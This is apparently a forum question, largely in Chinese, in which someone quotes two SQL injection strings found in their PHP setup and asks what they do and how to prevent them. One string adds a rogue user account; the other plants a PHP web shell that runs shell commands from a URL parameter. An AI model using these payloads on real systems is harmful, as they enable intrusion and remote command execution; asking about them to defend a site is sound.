1.
' union select 1, 'users (user, password) values (\'haxor\',
\'1337\') #', 2 #
2.
' union select 1, 'modules (plugin) values (\'if
(isset($_GET[\\\'cmd\\\'])) {passthru($_GET[\\\'cmd\\\']);}\') #', 2
#
- 这些代码片段是做什么的?
- 如何防止它们出现在我的
php
文件中? - 什么是1337?为什么有很多 \ ?